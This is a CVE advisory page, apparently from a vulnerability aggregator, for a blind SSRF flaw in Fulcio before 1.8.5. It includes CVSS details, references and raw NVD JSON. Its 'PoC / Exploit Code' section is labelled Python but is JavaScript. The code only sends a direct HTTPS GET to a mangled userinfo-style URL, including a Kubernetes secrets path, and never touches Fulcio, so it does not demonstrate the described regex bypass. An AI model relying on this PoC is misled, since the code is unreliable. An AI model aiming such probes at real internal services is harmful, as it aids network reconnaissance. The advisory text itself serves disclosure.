CVE-2026-22772

Description

Fulcio is a certificate authority for issuing code signing certificates for an OpenID Connect (OIDC) identity. Prior to 1.8.5, Fulcio's metaRegex() function uses unanchored regex, allowing attackers to bypass MetaIssuer URL validation and trigger SSRF to arbitrary internal services. Since the SSRF only can trigger GET requests, the request cannot mutate state. The response from the GET request is not returned to the caller so data exfiltration is not possible. A malicious actor could attempt to probe an internal network through Blind SSRF. This vulnerability is fixed in 1.8.5.

CVSS Details

CVSS Score

5.8

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:linuxfoundation:fulcio:*:*:*:*:*:*:*:* - VULNERABLE

Fulcio < 1.8.5

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2026-22772 PoC - Fulcio metaRegex SSRF Bypass // This PoC demonstrates how to bypass MetaIssuer URL validation const https = require('https'); // Malicious URL that bypasses unanchored regex validation // The regex might only match 'trusted.com' but the actual request goes to 'internal-server' const maliciousUrl = 'https://[email protected]/admin/api'; function triggerSSRF(targetUrl) { return new Promise((resolve, reject) => { try { const url = new URL(targetUrl); const options = { hostname: url.hostname, port: url.port || 443, path: url.pathname + url.search, method: 'GET', timeout: 5000, rejectUnauthorized: false // For testing purposes }; const req = https.request(options, (res) => { console.log(`[+] Request sent to: ${targetUrl}`); console.log(`[+] Status: ${res.statusCode}`); resolve({ status: res.statusCode, headers: res.headers }); }); req.on('error', (err) => { console.log(`[*] Error (may indicate internal service): ${err.message}`); resolve({ error: err.message }); }); req.on('timeout', () => { console.log('[*] Request timeout'); req.destroy(); resolve({ timeout: true }); }); req.end(); } catch (e) { reject(e); } }); } // Example: Probe internal Kubernetes API triggerSSRF('https://[email protected]:443/api/v1/secrets'); // Note: This is a simplified PoC for educational purposes // Real exploitation requires understanding the specific regex bypass technique

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-22772
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-22772
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-22772/
[4] VulDB https://vuldb.com/cve/CVE-2026-22772
[5] https://github.com/sigstore/fulcio/commit/eaae2f2be56df9dea5f9b439ec81bedae4c0978d
[6] https://github.com/sigstore/fulcio/security/advisories/GHSA-59jp-pj84-45mr

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-22772", "sourceIdentifier": "[email protected]", "published": "2026-01-12T21:15:59.457", "lastModified": "2026-03-05T13:48:17.443", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Fulcio is a certificate authority for issuing code signing certificates for an OpenID Connect (OIDC) identity. Prior to 1.8.5, Fulcio's metaRegex() function uses unanchored regex, allowing attackers to bypass MetaIssuer URL validation and trigger SSRF to arbitrary internal services. Since the SSRF only can trigger GET requests, the request cannot mutate state. The response from the GET request is not returned to the caller so data exfiltration is not possible. A malicious actor could attempt to probe an internal network through Blind SSRF. This vulnerability is fixed in 1.8.5."}, {"lang": "es", "value": "Fulcio es una autoridad de certificación para emitir certificados de firma de código para una identidad de OpenID Connect (OIDC). Antes de la versión 1.8.5, la función metaRegex() de Fulcio utiliza expresiones regulares no ancladas, permitiendo a los atacantes eludir la validación de URL de MetaIssuer y desencadenar SSRF a servicios internos arbitrarios. Dado que el SSRF solo puede desencadenar solicitudes GET, la solicitud no puede mutar el estado. La respuesta de la solicitud GET no se devuelve al llamador, por lo que la exfiltración de datos no es posible. Un actor malicioso podría intentar sondear una red interna a través de SSRF ciego. Esta vulnerabilidad está corregida en la versión 1.8.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N", "baseScore": 5.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:linuxfoundation:fulcio:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.8.5", "matchCriteriaId": "6D57DF83-B994-4FA6-B628-24987601A329"}]}]}], "references": [{"url": "https://github.com/sigstore/fulcio/commit/eaae2f2be56df9dea5f9b439ec81bedae4c0978d", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/sigstore/fulcio/security/advisories/GHSA-59jp-pj84-45mr", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}